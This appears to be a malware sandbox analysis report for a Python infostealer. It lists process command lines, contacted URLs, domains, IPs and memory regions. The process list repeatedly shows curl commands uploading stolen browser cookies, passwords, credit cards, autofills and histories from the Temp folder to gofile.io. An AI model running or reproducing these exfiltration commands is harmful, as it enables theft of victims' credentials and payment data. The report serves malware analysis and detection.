curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\dllhost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
There are 37 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://discord.gift/
unknown
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
unknown
https://coinbase.com)
unknown
https://discord.com)z
unknown
https://tiktok.com)
unknown
https://ebay.com)z$
unknown
http://docs.python.org/library/unittest.html
unknown
https://discord.com)
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
https://www.apache.org/licenses/LICENSE-2.0
unknown
https://packaging.python.org/en/latest/specifications/core-metadata/
unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
unknown
https://paypal.com)
unknown
https://github.com/pypa/packaging
unknown
https://store4.gofile.io/uploadFileb)1
unknown
https://refspecs.linuxfoundation.org/elf/gabi4
unknown
https://discord.com/api/v9/users/
unknown
https://gofile.io/d/qP6xXi)
unknown
https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpgr
unknown
https://xbox.com)
unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
unknown
https://youtube.com)
unknown
https://twitch.com)z
unknown
https://tools.ietf.org/html/rfc3610
unknown
https://github.com/platformdirs/platformdirs
unknown
http://curl.haxx.se/rfc/cookie_spec.html
unknown
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
unknown
https://crunchyroll.com)
unknown
https://gmail.com)z
unknown
https://paypal.com)z
unknown
https://cdn.discordapp.com/avatars/r
unknown
https://pypi.org/project/build/).
unknown
https://coinbase.com)z
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
unknown
https://github.com/python/cpython/issues/86361.
unknown
https://ebay.com)
unknown
https://httpbin.org/
unknown
https://roblox.com)z
unknown
https://hbo.com)z
unknown
https://binance.com)z
unknown
https://discord.gg/r
unknown
https://playstation.com)
unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
unknown
https://store4.gofile.io/uploadFilestore4.gofile.ioh.dll
unknown
https://sellix.io)
unknown
https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
unknown
https://store4.gofile.io/uploadFilecurl
unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3
unknown
https://discord.com/api/v6/guilds/
unknown
https://telegram.com)z
unknown
https://google.com/mail
unknown
https://github.com/jaraco/jaraco.functools/issues/5
unknown
https://pornhub.com)z
unknown
http://www.rfc-editor.org/info/rfc7253
unknown
https://store4.gofile.io/uploadFilene8
unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
unknown
https://mahler:8092/site-updates.py
unknown
https://setuptools.pypa.io/en/latest/0
unknown
https://api.gofile.io/getServerr
unknown
https://tools.ietf.org/html/rfc7231#section-4.3.6)
unknown
https://discord.gg/
unknown
https://store4.gofile.io/up
unknown
https://netflix.com)
unknown
https://github.com/urllib3/urllib3/issues/2920
unknown
https://gmail.com)
unknown
https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg0Gm
unknown
https://store4.gofile.io/uploadFileaml
unknown
https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg
unknown
https://outlook.com)
unknown
https://store4.gofile.io.uploadFile
unknown
https://github.com)
unknown
http://cacerts.digicert.co
unknown
https://binance.com)
unknown
https://youtube.com)z
unknown
https://spotify.com)
unknown
https://spotify.com)z
unknown
https://gofile.io/d/wXGekI)
unknown
http://docs.python.org/library/itertools.html#recipes
unknown
https://yahoo.com)z
unknown
https://store4.gofile.io/uploadFileEDRIVEf
unknown
https://discord.com/api/users/
unknown
https://api.gofile.io/getServer
45.112.123.126
https://steam.com)
unknown
https://api.ipify.org/
104.26.13.205
https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
unknown
https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
unknown
https://github.com/pypa/setuptools/issues/1024.
unknown
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
unknown
https://gofile.io/d/plrjGQ)
unknown
https://hotmail.com)z
unknown
http://ocsp.di
unknown
https://www.python.org/
unknown
https://store4.gofile.io/uploadFile
31.14.70.245
https://twitter.com/
unknown
https://hbo.com)
unknown
https://store4.gofile.io/uploadFilestore4.gofile.ioMY
unknown
https://twitter.com)
unknown
https://geolocation-db.com/jsonp/
unknown
https://store4.gofile.io/uploadFileOMEDRIVE
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
store4.gofile.io
31.14.70.245
s-part-0017.t-0009.fb-t-msedge.net
13.107.253.45
api.ipify.org
104.26.13.205
geolocation-db.com
159.89.102.253
api.gofile.io
45.112.123.126

IPs

IP
Domain
Country
Malicious
45.112.123.126
api.gofile.io
Singapore
104.26.13.205
api.ipify.org
United States
159.89.102.253
geolocation-db.com
United States
127.0.0.1
unknown
unknown
31.14.70.245
store4.gofile.io
Virgin Islands (BRITISH)

Memdumps

Base Address
Regiontype
Protect
Malicious
2085E24E000
heap
page read and write
malicious
2085E25C000
heap
page read and write
malicious
185BBD8A000
heap
page read and write
malicious
2085F215000
heap
page read and write
malicious
2085E24C000
heap
page read and write
malicious
185BBEFA000
heap
page read and write
malicious
2085F388000
heap
page read and write
malicious
185BC87D000
heap
page read and write
malicious
185BBDA3000
heap
page read and write
malicious
185BBD8A000
heap
page read and write
malicious
185BC87D000
heap
page read and write
malicious
185BC84D000
heap
page read and write
malicious
185BBDD4000
heap
page read and write
malicious
2085F38A000
heap
page read and write
malicious
185BBDF9000
heap
page read and write
malicious
185BC84E000
heap
page read and write
malicious
2085E860000
heap
page read and write
malicious
185BC84E000
heap
page read and write
malicious
185BC87D000
heap
page read and write
malicious
185BC84D000
heap
page read and write
malicious
185BC84D000
heap
page read and write
malicious
2085F1E6000
heap
page read and write
malicious
185BBF19000
heap
page read and write
malicious
185BCF00000
direct allocation
page read and write
malicious
185BC84D000
heap
page read and write
malicious
185BC87D000
heap
page read and write
malicious
2085E22D000
heap
page read and write
malicious
2085E25D000
heap
page read and write
malicious
2085E851000
heap
page read and write
malicious
185BC84D000
heap
page read and write
malicious
2085F214000
heap
page read and write
malicious
185BBDD3000
heap
page read and write
malicious
2085F1E6000
heap
page read and write
malicious
2085F380000
heap
page read and write
malicious
2085F860000
direct allocation
page read and write
malicious
2085F1E6000
heap
page read and write
malicious
2085E212000
heap
page read and write
malicious
2085E22C000
heap
page read and write
malicious
185BBEFA000
heap
page read and write
malicious
185BBDBD000
heap
page read and write
malicious
2085E212000
heap
page read and write
malicious
2085F21D000
heap
page read and write
malicious
185BC84D000
heap
page read and write
malicious
2085E24E000
heap
page read and write
malicious
2085F085000
heap
page read and write
malicious
185BC84D000
heap
page read and write
malicious
20860120000
direct allocation
page read and write
185BB698000
heap
page read and write
2085DCC0000
heap
page read and write
2085F0E4000
heap
page read and write
20860120000
direct allocation
page read and write
24541900000
heap
page read and write
2085E370000
direct allocation
page read and write
2085E583000
heap
page read and write
2085F228000
heap
page read and write
7FF8F85C0000
unkown
page readonly
2085E0B4000
heap
page read and write
185BC88E000
heap
page read and write
185BD7C0000
direct allocation
page read and write
2085DC41000
heap
page read and write
2085E4A3000
heap
page read and write
185BB75D000
heap
page read and write
18FDF277000
heap
page read and write
185BB69A000
heap
page read and write
1ED9B5C0000
heap
page read and write
2085E09C000
heap
page read and write
185BBF3B000
heap
page read and write
185BB701000
heap
page read and write
7FF8F8D84000
unkown
page readonly
185BB72D000
heap
page read and write
2085F1E6000
heap
page read and write
7FF8E6FE5000
unkown
page readonly
185BBC01000
heap
page read and write
1F32FE71000
heap
page read and write
185BB3A8000
heap
page read and write
185BBEC3000
heap
page read and write
2085DCD6000
heap
page read and write
25EE480E000
heap
page read and write
2085F27A000
heap
page read and write
185BB3CD000
heap
page read and write
185BC7C1000
heap
page read and write
171C4350000
heap
page read and write
2085E6FA000
heap
page read and write
1F496855000
heap
page read and write
185BC88C000
heap
page read and write
185BB7B3000
heap
page read and write
185BBD7A000
heap
page read and write
185BC772000
heap
page read and write
2085E557000
heap
page read and write
185BB6B6000
heap
page read and write
E6D811C000
stack
page read and write
7FF8E5BF4000
unkown
page readonly
2085E0FC000
heap
page read and write
7FF7C3CE1000
unkown
page execute read
185BB3CE000
heap
page read and write
7FF8F8596000
unkown
page readonly
7FF8E734C000
unkown
page execute read
185BBEFA000
heap
page read and write
2085E501000
heap
page read and write
185BBBB3000
heap
page read and write
7FF8FF5D1000
unkown
page readonly
185BD7C0000
direct allocation
page read and write
7FF8E802C000
unkown
page readonly
34014FE000
stack
page read and write
2085E471000
heap
page read and write
2085E478000
heap
page read and write
7FF8E6FD5000
unkown
page readonly
185BB69D000
heap
page read and write
1F32FE77000
heap
page read and write
22F6FE00000
heap
page read and write
24F21C80000
heap
page read and write
2085E09C000
heap
page read and write
185BB374000
heap
page read and write
7FF8E7191000
unkown
page execute read
185B979E000
heap
page read and write
4EAB9DC000
stack
page read and write
185BBBF4000
heap
page read and write
185BB960000
direct allocation
page read and write
2085E08E000
heap
page read and write
2085C273000
heap
page read and write
2085F244000
heap
page read and write
2085E212000
heap
page read and write
2085E212000
heap
page read and write
185BBCC3000
heap
page read and write
185BB7C2000
heap
page read and write
2085E1B3000
heap
page read and write
7FF8F8BB6000
unkown
page readonly
185BC060000
direct allocation
page read and write
185BBEFA000
heap
page read and write
2085E0A5000
heap
page read and write
185BBF0E000
heap
page read and write
25EFD912000
heap
page read and write
2085F1D8000
heap
page read and write
2085DC96000
heap
page read and write
185BBA60000
direct allocation
page read and write
7FF8F8755000
unkown
page readonly
7FF7C3D22000
unkown
page readonly
2085DC53000
heap
page read and write
185BD800000
direct allocation
page read and write
18FDF267000
heap
page read and write
18FDF269000
heap
page read and write
7FF8E5C87000
unkown
page execute read
7FF8E6F71000
unkown
page execute read
185BB349000
heap
page read and write
185BC7B9000
heap
page read and write
7FF8E6735000
unkown
page read and write
2085E16C000
heap
page read and write
2085F190000
heap
page read and write
7FF8E7E08000
unkown
page read and write
185BBF4A000
heap
page read and write
7FF8E7170000
unkown
page readonly
25EFD911000
heap
page read and write
2085F16A000
heap
page read and write
2085F159000
heap
page read and write
185BC87B000
heap
page read and write
7FF8FF5B6000
unkown
page readonly
2085E674000
heap
page read and write
185BD0EC000
direct allocation
page read and write
2085E4E2000
heap
page read and write
185BBBFF000
heap
page read and write
2085F084000
heap
page read and write
2085F173000
heap
page read and write
2085E4A3000
heap
page read and write
18FDF277000
heap
page read and write
2085F24D000
heap
page read and write
279B9010000
heap
page read and write
2085E582000
heap
page read and write
185BB672000
heap
page read and write
2085E674000
heap
page read and write
7FF8E6FE3000
unkown
page readonly
7FF8E6F94000
unkown
page readonly
7FF8F8D80000
unkown
page readonly
2085E49C000
heap
page read and write
2085E499000
heap
page read and write
7FF8E67A2000
unkown
page read and write
2085C2A6000
heap
page read and write
25EE4AE0000
heap
page read and write
138D1DA000
stack
page read and write
7FF8E6393000
unkown
page readonly
24F21CFE000
heap
page read and write
2085E870000
direct allocation
page read and write
185BD7D0000
direct allocation
page read and write
2085E114000
heap
page read and write
62486FC000
stack
page read and write
185BB341000
heap
page read and write
20860120000
direct allocation
page read and write
7FF8E5C22000
unkown
page execute read
171C4386000
heap
page read and write
185BD7F0000
direct allocation
page read and write
7FF8E6FC4000
unkown
page read and write
2085E77D000
heap
page read and write
2085E539000
heap
page read and write
5B2E90C000
stack
page read and write
2085E70C000
heap
page read and write
2085F0E3000
heap
page read and write
2085E103000
heap
page read and write
21D97670000
heap
page read and write
2085E15B000
heap
page read and write
24F21D01000
heap
page read and write
29F57F70000
heap
page read and write
2085E14B000
heap
page read and write
2085E0F5000
heap
page read and write
2085E0C3000
heap
page read and write
7FF8E6F65000
unkown
page readonly
25EFD905000
heap
page read and write
185BB856000
heap
page read and write
185BC879000
heap
page read and write
185BB3D6000
heap
page read and write
185BD7D0000
direct allocation
page read and write
18FDF26A000
heap
page read and write
185BC834000
heap
page read and write
279B9200000
heap
page read and write
7CAC9FE000
unkown
page read and write
2085DC84000
heap
page read and write
185BBB61000
heap
page read and write
2085E09F000
heap
page read and write
2085DC40000
heap
page read and write
2085E0D7000
heap
page read and write
185BD483000
heap
page read and write
2085E212000
heap
page read and write
25EFD8A0000
heap
page readonly
185BBBCB000
heap
page read and write
185BC7B9000
heap
page read and write
7FF8E8032000
unkown
page readonly
2085E1A3000
heap
page read and write
7FF8FF590000
unkown
page readonly
2085E1B3000
heap
page read and write
2234A6A0000
heap
page read and write
2085DC57000
heap
page read and write
185BD820000
direct allocation
page read and write
2085E48D000
heap
page read and write
2085E674000
heap
page read and write
7FF8E6F45000
unkown
page readonly
25EFD90C000
heap
page read and write
185BB3DE000
heap
page read and write
25EFD905000
heap
page read and write
2085F0CE000
heap
page read and write
185BB33E000
heap
page read and write
2085F221000
heap
page read and write
22F6FE9A000
heap
page read and write
7FF8E667B000
unkown
page write copy
2085E726000
heap
page read and write
2085E6DE000
heap
page read and write
185BB6C7000
heap
page read and write
185BB3C6000
heap
page read and write
185BD59C000
heap
page read and write
7FF8F85D8000
unkown
page readonly
2085DCD2000
heap
page read and write
2085E504000
heap
page read and write
2085E589000
heap
page read and write
185BB778000
heap
page read and write
20860120000
direct allocation
page read and write
185B9868000
heap
page read and write
2085E11B000
heap
page read and write
7FF8F8587000
unkown
page read and write
20D49207000
heap
page read and write
2085E1DB000
heap
page read and write
7FF8F7EC1000
unkown
page execute read
F3FDFFE000
stack
page read and write
185BD7D0000
direct allocation
page read and write
18FDF274000
heap
page read and write
20860100000
direct allocation
page read and write
2085F2C3000
heap
page read and write
2085F159000
heap
page read and write
7FF8E70CE000
unkown
page readonly
2085F06C000
heap
page read and write
185BC80A000
heap
page read and write
2085DC5C000
heap
page read and write
25EFD90C000
heap
page read and write
2085F1D8000
heap
page read and write
25EFD90A000
heap
page read and write
25EFD913000
heap
page read and write
185BD7D0000
direct allocation
page read and write
185BBE3C000
heap
page read and write
185BBE5E000
heap
page read and write
24F22000000
heap
page read and write
2085E48B000
heap
page read and write
18FDF26A000
heap
page read and write
18FDF26A000
heap
page read and write
20860120000
direct allocation
page read and write
185BD800000
direct allocation
page read and write
2085C2B2000
heap
page read and write
EA594FE000
stack
page read and write
185BB3DD000
heap
page read and write
7FF8E712F000
unkown
page readonly
20860120000
direct allocation
page read and write
2085E159000
heap
page read and write
18FDF269000
heap
page read and write
2085E0C2000
heap
page read and write
2085E08E000
heap
page read and write
28CCB3C3000
heap
page read and write
7FF8E7642000
unkown
page readonly
185B986C000
heap
page read and write
2085F0CE000
heap
page read and write
2086028C000
direct allocation
page read and write
2085F09E000
heap
page read and write
185BBD9E000
heap
page read and write
29612632000
heap
page read and write
185BC81B000
heap
page read and write
7FF8E6F52000
unkown
page readonly
185BBB8F000
heap
page read and write
2085E0BF000
heap
page read and write
2085E637000
heap
page read and write
2085DC85000
heap
page read and write
7FF8F6FA2000
unkown
page readonly
2085E11D000
heap
page read and write
185BB711000
heap
page read and write
2085E15C000
heap
page read and write
24F21CCD000
heap
page read and write
185BBECE000
heap
page read and write
7FF8E5C9E000
unkown
page execute read
20860130000
direct allocation
page read and write
7FF8F8401000
unkown
page execute read
21D97707000
heap
page read and write
7FF8E6F01000
unkown
page execute read
7FF8F9185000
unkown
page readonly
2085E18C000
heap
page read and write
7FF8E6F50000
unkown
page readonly
185BB417000
heap
page read and write
21D97735000
heap
page read and write
185BD1B8000
direct allocation
page read and write
2085DCD7000
heap
page read and write
E6D84FF000
unkown
page read and write
185BBE5E000
heap
page read and write
7FF8F8371000
unkown
page execute read
185BC8D8000
heap
page read and write
29F57FB0000
remote allocation
page read and write
2085E683000
heap
page read and write
18FDF277000
heap
page read and write
24F21D07000
heap
page read and write
2085E0F5000
heap
page read and write
25EFD90C000
heap
page read and write
185BB39D000
heap
page read and write
2085DF20000
unkown
page readonly
2085E1BD000
heap
page read and write
20860120000
direct allocation
page read and write
185BB3AF000
heap
page read and write
185BB395000
heap
page read and write
7FF8E5AE5000
unkown
page readonly
29F5802F000
heap
page read and write
185BD7F0000
direct allocation
page read and write
2BE0CBC0000
heap
page read and write
2085DCBA000
heap
page read and write
185BB3E3000
heap
page read and write
2085E153000
heap
page read and write
185BC76A000
heap
page read and write
185BC780000
heap
page read and write
185BD7F0000
direct allocation
page read and write
185BB3BA000
heap
page read and write
24A03BB1000
heap
page read and write
2085E86E000
heap
page read and write
185BB7D3000
heap
page read and write
2085DC4B000
heap
page read and write
185BB3DA000
heap
page read and write
2085E0D9000
heap
page read and write
185BBC67000
heap
page read and write
185BBDBE000
heap
page read and write
7FF67A601000
unkown
page execute read
1ED9B1F0000
heap
page read and write
2085E1F7000
heap
page read and write
7FF7C3D0B000
unkown
page readonly
185BBD50000
heap
page read and write
1F4964F0000
heap
page read and write
18FDF277000
heap
page read and write
2085C2B5000
heap
page read and write
296125F0000
heap
page read and write
10A39CE000
stack
page read and write
185BBEB4000
heap
page read and write
185BD7D0000
direct allocation
page read and write
2085DC97000
heap
page read and write
185BB3DE000
heap
page read and write
1F330090000
heap
page read and write
185BB6B8000
heap
page read and write
7FF8E7001000
unkown
page execute read
20860140000
direct allocation
page read and write
185BB3D9000
heap
page read and write
2085E77D000
heap
page read and write
21040780000
heap
page read and write
185BB358000
heap
page read and write
185BBC22000
heap
page read and write
185BB762000
heap
page read and write
185B985E000
heap
page read and write
2085E249000
heap
page read and write
A8D311E000
stack
page read and write
2085E58E000
heap
page read and write
185BB76D000
heap
page read and write
185BB33C000
heap
page read and write
2085E1D5000
heap
page read and write
25EFD905000
heap
page read and write
281E0200000
heap
page read and write
25EFD90C000
heap
page read and write
2085C2BD000
heap
page read and write
2085C2CD000
heap
page read and write
185BBD41000
heap
page read and write
7FF8F7AA2000
unkown
page readonly
18FDF277000
heap
page read and write
2085E4F6000
heap
page read and write
18A3D950000
heap
page read and write
5911FFE000
stack
page read and write
185B9838000
heap
page read and write
20860120000
direct allocation
page read and write
7FF8E6F05000
unkown
page readonly
24C759F0000
heap
page read and write
7FF8F8590000
unkown
page readonly
7FF8E7000000
unkown
page readonly
10A35DD000
stack
page read and write
185BD948000
direct allocation
page read and write
18FDF26A000
heap
page read and write
2085E176000
heap
page read and write
185BB7A0000
heap
page read and write
185BD7D0000
direct allocation
page read and write
210407C0000
heap
page read and write
25EFD905000
heap
page read and write
B16C74C000
stack
page read and write
29612606000
heap
page read and write
185B9806000
heap
page read and write
7FF8E7E03000
unkown
page read and write
2085F242000
heap
page read and write
2085F1CA000
heap
page read and write
2085DC29000
heap
page read and write
185BBB84000
heap
page read and write
2085DC88000
heap
page read and write
2085E4DF000
heap
page read and write
2085E08E000
heap
page read and write
171C4398000
heap
page read and write
2085F0F6000
heap
page read and write
1F4965CB000
heap
page read and write
7FF8E7E72000
unkown
page read and write
2085DBE9000
heap
page read and write
185BBF4A000
heap
page read and write
18C8AC90000
heap
page read and write
185BB764000
heap
page read and write
185BB7C3000
heap
page read and write
185BB346000
heap
page read and write
185BBCB4000
heap
page read and write
2085E6E1000
heap
page read and write
25EFD905000
heap
page read and write
7FF67A600000
unkown
page readonly
21040590000
heap
page read and write
185BB854000
heap
page read and write
2085F367000
heap
page read and write
7FF8F7EC0000
unkown
page readonly
2085C2AD000
heap
page read and write
7FF8E6733000
unkown
page read and write
25EFD913000
heap
page read and write
185BBE23000
heap
page read and write
185BB364000
heap
page read and write
185BC776000
heap
page read and write
2085F383000
heap
page read and write
185BD7F0000
direct allocation
page read and write
2085E538000
heap
page read and write
7FF8E7E74000
unkown
page readonly
2085F0E9000
heap
page read and write
2085DCC4000
heap
page read and write
24A03C80000
heap
page read and write
7FF8E6745000
unkown
page read and write
18FDF26A000
heap
page read and write
2085DCD1000
heap
page read and write
185BB3EA000
heap
page read and write
18FDF25E000
heap
page read and write
25308AF0000
heap
page read and write
185BBDBE000
heap
page read and write
7FF8F8741000
unkown
page execute read
185BB3B6000
heap
page read and write
7FF8F8BC3000
unkown
page readonly
7FF8E5AE0000
unkown
page readonly
4EAC58F000
stack
page read and write
185BBD84000
heap
page read and write
185BBC94000
heap
page read and write
2085E505000
heap
page read and write
2085EBB0000
direct allocation
page read and write
21D97707000
heap
page read and write
185BB358000
heap
page read and write
185BC80A000
heap
page read and write
2085F1E6000
heap
page read and write
24C758F0000
heap
page read and write
18FDF26A000
heap
page read and write
185BD7D0000
direct allocation
page read and write
2085E4A9000
heap
page read and write
24541931000
heap
page read and write
7FF8F83F1000
unkown
page execute read
185BC8B9000
heap
page read and write
2085E08A000
heap
page read and write
2085E596000
heap
page read and write
185B985F000
heap
page read and write
2085DC07000
heap
page read and write
7FF8F8471000
unkown
page execute read
26027FE5000
heap
page read and write
2085E580000
heap
page read and write
185BB6C9000
heap
page read and write
2085E21A000
heap
page read and write
2085E156000
heap
page read and write
2085E156000
heap
page read and write
185BC8CF000
heap
page read and write
7FF8E6F54000
unkown
page readonly
185BB69B000
heap
page read and write
25308700000
heap
page read and write
20860284000
direct allocation
page read and write
2085DC94000
heap
page read and write
2085F071000
heap
page read and write
185BC7A3000
heap
page read and write
2085F0A5000
heap
page read and write
2085E6BA000
heap
page read and write
2085E15A000
heap
page read and write
185BB66F000
heap
page read and write
185BBE5E000
heap
page read and write
20860160000
direct allocation
page read and write
2085E7B0000
heap
page read and write
185BB679000
heap
page read and write
185BB6F0000
heap
page read and write
185BB397000
heap
page read and write
185B9862000
heap
page read and write
185BC75B000
heap
page read and write
2085E583000
heap
page read and write
2961260F000
heap
page read and write
2085F383000
heap
page read and write
185BD7C0000
direct allocation
page read and write
2085E218000
heap
page read and write
185BC780000
heap
page read and write
2085DBE0000
heap
page read and write
7FF67A601000
unkown
page execute read
185B9837000
heap
page read and write
2085DA95000
heap
page read and write
21D81FF0000
heap
page read and write
18FDF26E000
heap
page read and write
185BBE37000
heap
page read and write
25EE47ED000
heap
page read and write
7FF7C3D22000
unkown
page readonly
2085E18A000
heap
page read and write
185BBB87000
heap
page read and write
2085DCC3000
heap
page read and write
18FDF278000
heap
page read and write
185BB374000
heap
page read and write
21040595000
heap
page read and write
7FF8F3F30000
unkown
page readonly
185BB66C000
heap
page read and write
2085E6AE000
heap
page read and write
185BB81E000
heap
page read and write
2085E5D1000
heap
page read and write
2085E0FB000
heap
page read and write
185BC8B7000
heap
page read and write
2085E520000
heap
page read and write
185BD7F0000
direct allocation
page read and write
21D976D1000
heap
page read and write
185BB405000
heap
page read and write
185BB358000
heap
page read and write
185BC8A9000
heap
page read and write
2085E1F8000
heap
page read and write
185BBBA1000
heap
page read and write
185BB363000
heap
page read and write
2085E53D000
heap
page read and write
7FF8E6F1B000
unkown
page readonly
7FF8E67A4000
unkown
page readonly
7FF8E670D000
unkown
page readonly
185BCACD000
heap
page read and write
185BD7F0000
direct allocation
page read and write
2085E233000
heap
page read and write
20860100000
direct allocation
page read and write
185BD7F0000
direct allocation
page read and write
2085DC0B000
heap
page read and write
185BD7F0000
direct allocation
page read and write
7FF8F8740000
unkown
page readonly
24541A00000
heap
page read and write
18A3D850000
heap
page read and write
2085E4DE000
heap
page read and write
2085DC40000
heap
page read and write
2085E517000
heap
page read and write
185BB72D000
heap
page read and write
185BBC80000
heap
page read and write
2085E26A000
heap
page read and write
185BBBA1000
heap
page read and write
7FF8E7E06000
unkown
page write copy
25EE47E0000
heap
page read and write
2B6485A0000
heap
page read and write
2085DC88000
heap
page read and write
185BB67E000
heap
page read and write
171C434F000
heap
page read and write
2085E0AC000
heap
page read and write
185BD7D0000
direct allocation
page read and write
7FF8E6F31000
unkown
page execute read
185BC8D8000
heap
page read and write
24F21CCF000
heap
page read and write
20860120000
direct allocation
page read and write
7FF8F9183000
unkown
page readonly
2085DC73000
heap
page read and write
25EFD90C000
heap
page read and write
7FF8E7019000
unkown
page read and write
29F5805E000
heap
page read and write
185BB6BC000
heap
page read and write
7FF8FF573000
unkown
page readonly
2085E669000
heap
page read and write
21D976DC000
heap
page read and write
2085DC2A000
heap
page read and write
185BB369000
heap
page read and write
185BD7D0000
direct allocation
page read and write
185BB7E4000
heap
page read and write
2085FB24000
direct allocation
page read and write
185BB778000
heap
page read and write
25EFD905000
heap
page read and write
296125E0000
remote allocation
page read and write
7FF8F8743000
unkown
page readonly
1F32FE36000
heap
page read and write
7FF8E6F87000
unkown
page readonly
185BBEA3000
heap
page read and write
185BBE5E000
heap
page read and write
185BBD28000
heap
page read and write
2085E4FC000
heap
page read and write
29F58068000
heap
page read and write
2085C28E000
heap
page read and write
25EFD905000
heap
page read and write
28CCB3AB000
heap
page read and write
185BB824000
heap
page read and write
20860120000
direct allocation
page read and write
185BC7B6000
heap
page read and write
20860130000
direct allocation
page read and write
185BC8B9000
heap
page read and write
10A37DE000
stack
page read and write
2085EF60000
direct allocation
page read and write
7FF8E77C0000
unkown
page read and write
2085E6AA000
heap
page read and write
2085E4FC000
heap
page read and write
2085C1A0000
heap
page readonly
2085E249000
heap
page read and write
185BBE42000
heap
page read and write
7FF8E6FD3000
unkown
page readonly
2085DC54000
heap
page read and write
21D821E0000
heap
page read and write
2085DC2B000
heap
page read and write
185BD59F000
heap
page read and write
2085E15E000
heap
